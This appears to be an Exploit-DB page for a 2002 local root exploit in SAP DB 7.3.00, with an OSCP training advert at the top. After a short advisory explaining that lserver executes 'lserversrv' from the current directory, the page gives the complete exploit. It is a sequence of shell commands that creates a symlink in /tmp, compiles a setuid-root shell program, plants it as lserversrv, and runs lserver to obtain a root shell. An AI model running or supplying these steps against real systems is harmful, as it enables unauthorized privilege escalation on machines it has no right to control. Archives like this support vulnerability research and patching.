SAP DB 7.3.00 - Symbolic Link

EDB-ID:

22067




Platform:

Unix

Date:

2002-12-04


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/6316/info

A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory. 

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver